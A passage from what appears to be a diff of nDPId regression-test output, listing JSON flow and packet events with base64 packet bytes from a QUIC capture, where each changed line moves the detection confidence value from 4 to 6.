b7ARqcsGvnK0HqjBlCVzGLKSDZa9icKkesJuZEIs2gxlcPU4atpOweh\/JejTvw0JRDflvusFCZ8LggbOTt4dNGmwJ7Mbm0OCxLaIc0U9h9Ubab5kq6QWk6OCd0h\/j2UBY7LZFZszsTdUnL22e1bgg4XWpAYp7qn"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431301735,"flow_last_seen":1621431301735,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431301735,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":53431,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.gstatic.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; 
Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431301735,"flow_last_seen":1621431301735,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431301735,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":53431,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.gstatic.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1621431301808,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431301808,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFJpAAH4RYWKokEAFgPgYAdC3AbsFTrrvzP8AAB0I1Sc982lv31UAAEU0zeT7R306i0MUyYVVPZIk\/KZWGL6jbpzbn0wPmz3fvD9vdn3cNYtKf4Qtet1U\/nGKiDokhhMmX3\/BVLzQQyqFmb\/M8TdFlsBDC0dAZ5ykvarKqbUTSTgiy95Q6LfVZMqkeHJMsDpJptTPVl7gjw06GKLx5TW5G91hLE1FqeLb\/dNBqxaEBgwW7oSUsitPRczOioi+LEcRagKP4t5qnZ8aDmpfz8FLrvCECdKPswENLWuAf9Vmj\/tnC4GhgFxsu0TzsfmUVaQeeSZw9PR7DmOen7ZDKqiRf3DrGbxH8xiO73GPBoBDQjgENrZosMzfCGZE\/MTUgNw05SO8IzaGjJfPHze+4QhEnPM020WOHSfwtq28RMPlwJJF02yo3wlT\/NJAKohp0A5KX75ENMuJSkJLQaSqe0zoJ0tVJo5191cibx8Sz62pctFEM4BebxdU+RpZo0LdowaXCq1sachUxpRRHMdssDm0qblyaHts6qPgulEBH7aEgucpskAryrCvygwocC7svHgVLBmM\/+xK0IluLWY+kqgiVSTrV8WnG+1L5QgeJxSFASdp6Ns0TgD8Il7BJ8o5ajit3BypcmDF3DPrrI+Qx7QiBRmTSSPFFvm0GF3n7i0EkY2Hm8DzbT3wnL2YHAkVv9zggjYvZo1n1LI739jXkeIRrfAzGVeEvRFZmvKb1OdgKztEkV0hoFvvBdOHeKuCUUz4hKnv2+\/lYocOo+kRXiezYBrj7PqFapYBg0p2eH\/igSHIYxfLy7ikKIGXi4rRNmWXUqjcq4WUp8XDBW4tb+Z90I\/+mhDOTUok1Nigx2G\/7KbfM22h\/apHLFvkn9EIt06RDs3B76xXAur0AM2Ip6AMuYDnxYolFxG2K3ctE2xC1DRz7n0lKt3HhiR\/P5zOKCm0DfhmASldwBhjifKegO2oN9vU7M0DdrAxP\/JNcYjpWs+ie2MFdu2lsdJOex3XTLsfX1fJC8LBGXc1sOTG8uWnisGATLFKyNfzBcvv5C\/U2hjtcTGAngc3itVAnAbl+4hQ9s3hUMWsUk8+RJ0zRwPQbX2nZmyIhql2s6FpohxHCq5UoWxXh22BLb0zwRAvo6A759ODMT15ISyiIq\/u6XtqcB6tFsY4SDCIUFZLCzn8LY8hNbxKnIvT+kZgjTz2dylh0rVAxuhuUhpxNkpru0GmszDQWJ+1v76Pi\/R7HWIGyiEs+YivcWX8jXFsjBB8QfSitgQCCwYnJt4tNaulx0t7\/KVoJPhMWx2cAxrfacv8GgasdSu65cuLmWAlMC9W3slT8e4g0\/tto\/lATo46xcKpYU+fjCGriKRqNQMloM3kkzYIDJ3SwWWEk\/P3rFXpQXMr\/b1crw62J6Glt4mO9QzYLHGzgKwu\/euJxbE+eJO1ae7IMc4NRHHR85ltAKeR8XgoQo5N68sqCn2+MBEpQtbXHWnBMQz2HW6tkMHrohxRM8\/o23cHXL
k1EsRmSry6aPgKepAtHk5rhQZjUer1NzID\/c8S0mu1iEEhSc4CLtwDa95xWQxcI5HMEDAcxxwRU\/MIaLOsI\/5mt+17GR+up2thq6thFHPVXAw+joWJg2Ed0ILpT3Tut1YgVVqZwcLTcnwOfBYMiG85DaaijQFB0dttNIqmW221\/RwD0coicDTwZyNZ\/VM3mnoVjqC6Lpsnt0MQaGsPhgoIU69TDIf9rzi7vHvOjiyWK40BX3xDHBVCSUpf7QS+RYWcOrXrADOELfOVIriZ9QMjQ4fxzn65DpF0UVgcyVId7aKLIvC4Qfz3"} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431305591,"flow_last_seen":1621431305591,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431305591,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"121.209.126.161","src_port":50482,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1621431305591,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431305591,"pkt":"AAAAAAAAAAEATej1CABFAAViY2BAAH4RsyKokEAFedF+ocUyAbsFTqiTwf8AAB0IW3iwt+y2cooAAEU0BEmji8W\/r6QQo738TO7y5dSuNAh8prkXOpfADst+Jc9Q9tTb4UI0vRbpsBAc\/wRyLzFYUecQ317zmJMLzTZl8Jd3ZiRr7yYjKX37LDNWlAoicKC4oliOH\/Fml25DnlNIMC5nvpDkdC5bMRw90FXK08RrmaBrmDz8JlipdUNPgq6+Ks9KDpvkjFtGyj5dpZ3gMuMYJ\/WogIBs3JzPpqngAdy\/QWH\/r\/vNVwYPPIH7tiEsC65BQyTkA7HqsyJkff7L\/WpxQokdQkBU8i8+seczGsyXRW\/ZJe3L2iHzkGEklOIcNZo10nU0am\/+mFv9bszZ1gDimSJ88GZcWsSJNfq+Q47ZVtA8nRSUIxcfLFnXeJPf6PU\/rb3+S0qU3oZcpaHV6agh8jvjdO0w\/VOq8qxpuNAX4LkLt40P2U151YrBr5x\/OeUgR+Z6s3QT73\/HzfP90bJE2S0skEBr+RDQY13GKYZklk5d8PV2Kpo38KXeuKakskZ5wi2woJvrGxrjC6dy\/btETblhn
8osDCW539k50fXlOVrNB4tYZhdBrjJHSlXfbwhprDerXi32Hb5v8GxP+TWGbi0qBKv5xhEw3E7lsExoF4hu7AxtupA6MXdD\/\/f6nsoiLIb502HAdNTho568FOnbHatxotovMfok8tB77tKCpaP0enN8SDSqa1eXr3phlwvrsB1N8IyoHeHhPDB3mlqSTzZyp2hhDwIOLk5l9eNXb4xHGzjApfQLHaY0en\/gogDLaQeVjuQnQc70f+A2ywlWAXdLkP2C9LVdtL1r7vtwucagunaQbNYFe4w7n642v6LRQNiKSvAkNFxBJOicXbTdkburmROhEgL56f1Q93ZrU9KAY9ux7cXUbSz2tjxs8Qa6wJIeIr1x2JPW2pY3ylGZZDYZAu7yqS63SBDTa0WDJ2YdAWunIZm+DAVfhjaZtAj4eI4w6uPQAjhrCoPjKrLErXzuqx7sXAJFQxO2A4zcoit4huJuMpqzdY1UgUeAgie\/SSepMph5oCom4eMvOEKwkc5QonRZdyIpiAxa3aAdkn30E8RE6dtdPGch4nRH6Z6peyUQ\/xzAePd1pt+2lyuSFBwrXLkpjjk2T63ijkoMVykG1jIHqTL6VbWyhP4hLLhnznJc2v\/BPjkdBh0PPpuMO1BZZkopd7nuoNr7BIQeDS6PbzpyxT4WKDIasLmDyHw\/yGw\/r8T2HaOKcScYHVbxhlOhwg6vkVvTNtbDIUTpL+GcmTWQxz0+awTxBntBHWW2XF+QqtpquB3MGHkRjBzMGrwtChsrY5glPcwPNrPPPLFMguiPMSM5jSzWBWTIU1NciHn8dCkbmPwG75IN6zA3mioUEB3Ek98007I\/5so2LorUnz3QUpb09VXFeljvTD2\/ONwYANmDdDPP3pM62BtSycqNiX2CbGC5Vyjl2JuRWiIOpVgN4mTK6bkJK0Yc2Tt\/hfALU39E0hCz98Xsbk9g25C347kmDI+6o5J5KOTGciKIBmxTx0XS39uDAuhpOwuMMZXpcx4Vf04JfLuiNBot7rciv\/jQgEJAvfOFnFnTy\/cjvf8Z72bMe3Clm4eVyPKPxVWWCFWN4MZIPXhStwfxp7L9YCMfW5\/oi9I+Q5eaFQyvJaVOOHoLaBbG2DcrLP0Wl9HuaY\/B4CRtnuzBzHGKGio7n5DsFpRrH7tc6ky4QWHp5YEC+gVU3FroThHyBQkDCWRmOzPOImY6RD6ATpJNX1fGD3U1V12VcoYmjJM+eh+pvzZzfI2d57bkQ+g\/9Ch7"} -00926{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431305591,"flow_last_seen":1621431305591,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431305591,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"121.209.126.161","src_port":50482,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": 
{"client_requested_server_name":"yt3.ggpht.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00926{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431305591,"flow_last_seen":1621431305591,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431305591,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"121.209.126.161","src_port":50482,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"yt3.ggpht.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431307075,"flow_last_seen":1621431307075,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431307075,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"158.146.215.30","src_port":62652,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1621431307075,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431307075,"pkt":"AAAAAAAAAAEA00bUCABFAAVijzpAAH4RCgqokEAFnpLXHvS8AbsFTmfYwf8AAB0IMX0JnIww67UAAEU0WXLvZGE+Afr+idrQ20zR+TEoH4qe7FkehtVpAee47RFYupCIo0eg\/DcR8TUJutvknKHjy6Va8WSvM1EWCYimGhVvNrQ+Fp0wmM+yyFY35rO08kD00xrPXP1H4Fk1Ofd1UfnQJk89eBBrRrAgNIIZzsqrTA2YPMgSp4UwmAVHJRtVJBMno66qsQpB5MQvisi+MDZENkGh9aq9g0sgJGWK095wFoEHqSie1cZEJH0NF7S9OLvFWBFqkCvegn2Nbgv1X3v0U4FwZWypfbJWLFwEnbR3285EnVWxHk\/SMMkHZmF0On1dQwUg3Qj0eZgGpqJ+FXEKe4uYJaEDgW57O4nU+0rSjJ3XzXQlfhw\/N4zTyFc0pjNRVcZvLiMXSfY4zYW3s6AIQlPy9VOM0+Sd2IN1gmmyrlJylMJVvj5QnrEWhimJh+zZEQruzz2mkSk8RFBjfgmsnANxoo9pkoo1TS97QkqmEvwlZfg6yosepp9RK65\/6peOS8TJ315KsHvbCu5MVzH5I4uEAg3ATybL0\/q2fjNpY\/e5kXcbiGD0xrzms9EN4h9y46YS0qZtRxTb54e2+c\/tkGE9oXd6ejJH7up2JrHyebJzWgY7y1\/4vmipy3uHgTNouauHpshSLQuocj\/IVA+m8M+S\/vIZxEEN5HxEShVKdzz3MydKf3IeaXIEkOogNU0EAfQF+FNMB1pAv4kA3D\/lhiw4mNTz7Pn2czcGqAoVM9Tb+FIl0v4naUGL2XsyFHEd0pdrvK0kyagKybt4WV5sy5dTFsU8oIYAkaDi0C0uvM\/hkA5rmYfgUGBRK7JNxcGRlB1h0fO7BcK++y+yfMx3k+B1cK7ObenTJrzFdENU9FiKc1npqAEG6qvPQ0489f2iKZpGKUe0BeleNnG8VKEEH4oM7w1ZPNdb6xC7Ch9EIMjjHN\/cAXUVd2BiR8doMWSeLNhCQrg5YRmEpmom8\/\/QGV8iDszvv8hWt\/MyXIyygAe9+QVeN26ZFXxatsAZKhRgqeS9+v7iRbNhTv\/yp28d0NIRzYLEysp\/VKAJSY\/PxvxR6eYrq0gk8M6gyt\/4BK1ZsK1h+llwW9nD\/t+dSlwau5F0J9hNHyoTUxT3\/2rWXx1WBqmNf7tT6HVASdYqI51YLphC\/t4BsXjG1U2fCZdns7t3a7Bu9FrBapBq8ozxlEwnaYBf9iuXer9XDB+ZQgwar2qMLM45G4ilP6GA0RkrpFDMK\/tSM78ey1CFRzLoD7+UjYyTIDcNhz56WZW\/cCCxyuopmvh2HuMiOaBDLX0ZH5LorqUuKLVpyJEcSbWHqdDvEIC2OQcfgQk4oVo+j3e1KvcgwqJTHG1uKoIKEu0XzvPdTW0gMnxGMRrPwDFCo77mU+Wk7zWBWHmjHLet1\/dYxkU8+0PHq4hWTvyi2WvPZLluvohq\/uVh5PNNj2h1VQCyJSuGN4gUneosa8Kp16gjYZ9wlLexO
QBxfrtdOZHNANUy9BWZE48pGmjMCVwkfj5AoR+lwxIH1PbYVdSg1W6n2FrEJeYRs9EjR5zk5Ib8sLvbIBr0bkcLFp09zWWWvyzA5kGStYwmIoFVfVK1M8DAb6EOkQ\/RECglK66h9GO4PSBtbey5+Whbs8ZQwqwshqhdGjb\/1OCebCFnJxT4b25yYHn79Vu70lJgCSdcmKtbvBQodyXcJt1eGqpdLpKIO+Eplu9mc1YnLPgFA\/NdEhN2SwFoPGLdsaCDBDsYWHvxDTBH03HR3HVl7PSSq9lVQAnF9xjB0hUGCVyMcbzWm4Fj"} -00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431307075,"flow_last_seen":1621431307075,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431307075,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"158.146.215.30","src_port":62652,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"static.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431307075,"flow_last_seen":1621431307075,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431307075,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"158.146.215.30","src_port":62652,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": 
{"client_requested_server_name":"static.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431309055,"flow_last_seen":1621431309055,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431309055,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":63136,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1621431309055,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431309055,"pkt":"AAAAAAAAAAEAS1QMCABFAAViW5hAAH4RACCokEAFCUGp\/PagAbsFTk75zP8AAB0IoJxBQBoX7TgAAEU0UJzG+bCyeSlhjmh9OGyP80hWwr1IV5nm+47YLijEK3KQr7gE9aToyGrLFbSZbr\/ot\/\/NhrLMkx5w9hUXpB6saN0FW9GivaLO3QW6nH3CEbSTx0vN4IWlz\/JYiJgSRdKp5yiIMpfFGjzOrzdapK0tDb+uDfZlGSI6b4fOTqadVuIZa7Vvz80YKtnFc+CKsIoEHyG+RVKlu8E7nUsvdaU1zjAfOXguC2O447Mq4l4iIuNZPa3X4qwTb1oBJViD2q6N5mxCHocUwd5IC1Czt\/KzM8ZvYZiaIu37vHuF4pEg0uyFIwWyEK0I3dICXfUy0FAthUUXOSQ\/qAjh83pIDqDmLm2oIH2HOI5yuYZbg4RhR2LcjLBI6jzxoT8wFqrBDURuZdJcnHFDl0KIt+h53s1VG0ioJi9EFRahccLL15Ih+xhJfJizq7Pj4ctwKdbyHsA9jLbn7BGdV2gCwR8YorYeGvatXhw3zhkfV39Cwpeuujb2aCauSV78zlMabBFL4I8dN4braPEQxADv6t882wA3cfqZmbZ60uGkg8o\/gGbldbBIsa\/FRs5yHZAy3QpgKNCZfgBmMgS7eLFSJs6rcXTEaMTPDLwpJJgNTV5
uiX2tJSaIJYr3pSISnTR89Gx0X3HmUn\/Ja6T0TIlgJKfs7TsyV3\/O+pj\/KvUyMCLdWAd6hc3OeA+YtszQ9IkT0t3IpA1OTS8L7ZNGDMrpzcZ49\/um9SKUYcvskuDPhaNggUksgvTJNkykAOEaY25imLNje+fio\/CgCrOEzLgy9G+NM0WtOHSe3sLkVdRGEAlB8ruk5vv2PFS6ZLA25T0hhIjNffnQm3+PTFk9kp5zihC0fqEooPgerPJ+8+JYctFK\/gLWRbc6OMvqllIpSOsFv+DIs2hi7N22XRUDShPiuab421vCGIiM7eiQl2FqR1tqIihAoVLym23eHpBpBbJFceMhPtBiXoKcb55LGt9SppKd+KwhSDGVu3bTJZszb6XgDMccDIvwEjkETVY7jOTOHyZT0drrSCyhKYmxWWJw9iI7nyCGfm19D9sxHMXlftbXZVq2QywR0n8Tcly1vSGHvWdt6+A1Ohb0q9GI+TDf1MnPjKVMbc2Kjk4sa1bJ8BlYl2eeag5iJ6VyYM+GwJgezWvXmBp3qA2zBEXJQaqQ9yhweRmQybXzLdvwRU9OJ\/DC+vNSBAa8gMAK9mY5Yzv1YBeC909GfAlJvGCjI8JOls25+LbiBJQ85Ab9s9IytjWrn\/cyj3XQ4p1l6hp+Q080riZKDTXmNwz+ZUmSDeZjTgPQUatAzktduFtFx07hplZWmV+lNMIP2zDrs9dhGgepus2\/ERahVwFr5jRDchF2jCx5cqTiE9CwuAwI4ztSewXM+keDsmAAoGV8qicjKAmokyTujz8Pt0ubuL7Zo3\/+EwH0Fu0yqTI0PlfkDAxftdvubX0DwkPEL1Ys1JczkA5o2okvwzloGIRmG\/5p2ZLhuCcIfTMkB5hPFgkXmWE8bNKCsiCijKcxlJE58T\/Bs7KO99VWovYSh7XujacQIsrOWD4ngpsxQOnWzWHNI6Hz9zoCr3iAZfUtemo08nKkjt3hmmff6D2iPsNJUeEJV+R5NWzGfh4YokledF0c+qgfcyMCt23zpaXdET5Xlf0TYwS3j7a7j5hWdjf+2+Cp25Y643N5nVwFZXgmHCtXCbP\/TIPT+qvhoV6jTaL+\/rIu0EzVrFyk1QmNvT1Yr01Lyy4C0Uugxd3xMMGXt8WcXVXvtz\/2H0LnL9UTOZ0L"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431309055,"flow_last_seen":1621431309055,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431309055,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":63136,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"suggestqueries-clients6.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows 
NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621425498439,"flow_last_seen":1621425498439,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431309055,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"251.236.18.198","src_port":44252,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621425516873,"flow_last_seen":1621425516873,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431309055,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"202.152.155.121","src_port":55273,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
+00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431309055,"flow_last_seen":1621431309055,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431309055,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":63136,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"suggestqueries-clients6.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621425498439,"flow_last_seen":1621425498439,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431309055,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"251.236.18.198","src_port":44252,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
+00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621425516873,"flow_last_seen":1621425516873,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431309055,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"202.152.155.121","src_port":55273,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 